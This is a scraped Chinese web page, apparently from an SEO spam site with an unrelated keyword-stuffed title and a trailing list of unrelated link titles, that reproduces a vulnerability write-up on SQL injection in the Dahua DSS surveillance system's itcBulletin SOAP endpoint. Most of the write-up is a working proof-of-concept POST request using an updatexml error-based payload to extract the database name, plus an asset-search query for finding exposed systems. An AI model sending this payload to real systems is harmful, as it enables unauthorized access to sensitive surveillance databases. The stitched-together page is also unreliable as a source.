当前位置: 首页 > news >正文

网站设计开发人员桂林八景

网站设计开发人员,桂林八景,平面设计师兼职网站,做百度翻译英文网站漏洞简介 大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验#xff0c;导致该接口存在SQL注入漏洞#xff0c;可通过注入漏洞获取数据库敏感信息。 资产测绘 app“dahua-DSS” 漏洞复现 POC: POST /portal/services/itcBulletin?wsdl HTTP/1.1 H…漏洞简介 大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验导致该接口存在SQL注入漏洞可通过注入漏洞获取数据库敏感信息。 资产测绘 app“dahua-DSS” 漏洞复现 POC: POST /portal/services/itcBulletin?wsdl HTTP/1.1 Host:your_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Connection: close Content-Length: 341 Accept-Encoding: gzips11:Envelope xmlns:s11http://schemas.xmlsoap.org/soap/envelope/s11:Bodyns1:deleteBulletin xmlns:ns1http://itcbulletinservice.webservice.dssc.dahua.comnetMarkings(updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (11/netMarkings/ns1:deleteBulletin/s11:Body /s11:Envelope成功查询出当前数据库。 Sqlmap验证 修复建议 1.升级至应用最新版本 2.部署WAF防火墙进行防护。
http://www.dnsts.com.cn/news/61277.html

相关文章:

  • 不让网站在手机怎么做搭建一个网上商城要多少钱
  • 合肥网站建设公司网站建设阿里云
  • 会用wordpress建站wordpress 文章付费
  • o2o 网站手机网站开发 c
  • 机关网站建设的请示装饰工程公司起名字大全免费
  • 厦门网站建设外包东阳住房和城市建设网站
  • wamp网站开发网站建设 宜昌
  • opencms 做的网站免费wordpress外贸主题
  • 网站认证主体唐山的做网站的企业
  • 深圳百度网站排名优化宠物主题网站模板
  • 网站系统性能定义白城做网站
  • 泉州市城乡和建设网站聊城做网站做的不错的
  • 网站seo诊断优化方案骨干校建设验收网站
  • 建设网站观澜wordpress the7 theme
  • 【郑州网站建设】雏鸟短视频app软件下载网站
  • 佛山自定义网站建设网站 图文混编
  • 做 网站 要专线吗商业网站建设的方法
  • 通州网站网站建设做网站的公司如何推广
  • html5响应式手机网站合肥企业网站营销电话
  • 网站建设规划书总结怎么写编写wordpress主题
  • 临安市规划建设局网站东莞寮步网站建设
  • 手机网站怎么做微信登陆做的网站怎么发布
  • 制作网站程序her123 wordpress
  • 邯郸建设企业网站广东省建设八大员网站
  • 设计logo网站免费奇米动漫制作专业升本
  • 做废钢铁生意在哪个网站了解上海旅游网站建设情况
  • 影响网站权重的因素网站建设 腾云
  • 卧龙区网站建设价格网页设计作业怎么打包
  • 衡阳网站建设 千度网络怎么创建文档
  • 前端网站主题怎么做营销推广型网站公司